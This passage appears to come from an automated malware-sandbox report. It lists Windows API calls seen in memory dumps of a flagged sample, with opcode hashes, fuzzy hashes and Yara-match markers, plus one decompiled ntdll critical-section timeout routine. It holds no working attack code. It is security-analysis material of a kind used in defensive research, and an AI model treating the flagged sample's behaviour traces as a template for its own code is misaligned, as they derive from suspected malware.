                                          • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                          • Instruction ID: 18e52c56ce5632e43cde2340c232913307853d68b4df6d8deabb747b3ca8fb88
                                          • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                          • Instruction Fuzzy Hash: 4801AFB2210108AFCB54DF89DC81EEB77ADAF8C754F158258BA0D97241C630E851CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00AA44F6,?,00AA4C6F,00AA4C6F,?,00AA44F6,?,?,?,?,?,00000000,00000000,?), ref: 00AAA04D
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                          • Instruction ID: b21401de038eb00be862a0cc7c3a4bd5990a5b5726d33c109ac2ab7e2a2bd06f
                                          • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                          • Instruction Fuzzy Hash: 59E012B1200208ABDB14EF99CC41EA777ACAF88650F118558BA185B282C630F914CAB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,00A9F192,00A9F192,?,00000000,?,?), ref: 00AAA1F0
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                          • Instruction ID: 221ab32ba7181affdb9c60fb5938a1fd0129890442312ba8cf1819f9ad432137
                                          • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                          • Instruction Fuzzy Hash: ABE01AB12002086BDB10DF49CC85EE737ADAF89650F018154BA0C57241CA30E8148BF5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetErrorMode.KERNELBASE(00008003,?,00A98CF4,?), ref: 00A9F6BB
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                          • Instruction ID: 0100ebdff841ead1454c13ba01fb70ca2fe8602590538c4874bc883773fb71e2
                                          • Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                          • Instruction Fuzzy Hash: 02D0A7727903043BFA10FBA89C03F6632CC6B55B00F490074FA48DB3C3DA54F4004165
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.912852622.0000000004AE0000.00000040.00000001.sdmp, Offset: 04AE0000, based on PE: true
                                          • Associated: 0000000C.00000002.912976785.0000000004BFB000.00000040.00000001.sdmp Download File
                                          • Associated: 0000000C.00000002.912987032.0000000004BFF000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: f6c4ba527b22d5644eca1ec327401bbc13172cccd317e37e74cf109f529a454a
                                          • Instruction ID: 6c1f4592b597b81112ebb4e35bf0e2bdbe409ae8a54c80d02c9cd19a3c8c264d
                                          • Opcode Fuzzy Hash: f6c4ba527b22d5644eca1ec327401bbc13172cccd317e37e74cf109f529a454a
                                          • Instruction Fuzzy Hash: 87B09BB29424C5C6FB51D77046087177914F7D4745F16C195D1020641A4778D0D1F5B5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          C-Code - Quality: 53%
                                          			E04B9FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                          				void* _t7;
                                          				intOrPtr _t9;
                                          				intOrPtr _t10;
                                          				intOrPtr* _t12;
                                          				intOrPtr* _t13;
                                          				intOrPtr _t14;
                                          				intOrPtr* _t15;
                                          
                                          				_t13 = __edx;
                                          				_push(_a4);
                                          				_t14 =  *[fs:0x18];
                                          				_t15 = _t12;
                                          				_t7 = E04B4CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                          				_push(_t13);
                                          				E04B95720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                          				_t9 =  *_t15;
                                          				if(_t9 == 0xffffffff) {
                                          					_t10 = 0;
                                          				} else {
                                          					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                          				}
                                          				_push(_t10);
                                          				_push(_t15);
                                          				_push( *((intOrPtr*)(_t15 + 0xc)));
                                          				_push( *((intOrPtr*)(_t14 + 0x24)));
                                          				return E04B95720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                          			}










                                          0x04b9fdda
                                          0x04b9fde2
                                          0x04b9fde5
                                          0x04b9fdec
                                          0x04b9fdfa
                                          0x04b9fdff
                                          0x04b9fe0a
                                          0x04b9fe0f
                                          0x04b9fe17
                                          0x04b9fe1e
                                          0x04b9fe19
                                          0x04b9fe19
                                          0x04b9fe19
                                          0x04b9fe20
                                          0x04b9fe21
                                          0x04b9fe22
                                          0x04b9fe25
                                          0x04b9fe40

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04B9FDFA
                                          Strings
                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04B9FE2B
                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04B9FE01
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.912852622.0000000004AE0000.00000040.00000001.sdmp, Offset: 04AE0000, based on PE: true
                                          • Associated: 0000000C.00000002.912976785.0000000004BFB000.00000040.00000001.sdmp Download File
                                          • Associated: 0000000C.00000002.912987032.0000000004BFF000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                          • API String ID: 885266447-3903918235
                                          • Opcode ID: 44f14164b973f7c804aee15121a7d98519f4066ae91f2631546ff9fa97d87463
                                          • Instruction ID: c4bc61895a733454cd7ae9fea4e8c9f97b4688b08fa2fac1de331ed6069dffce
                                          • Opcode Fuzzy Hash: 44f14164b973f7c804aee15121a7d98519f4066ae91f2631546ff9fa97d87463
                                          • Instruction Fuzzy Hash: 2DF0FC332405017FEA211A45DC05F737F9AEB44730F154354F614551D1EA62FD2097F4
                                          Uniqueness

                                          Uniqueness Score: -1.00%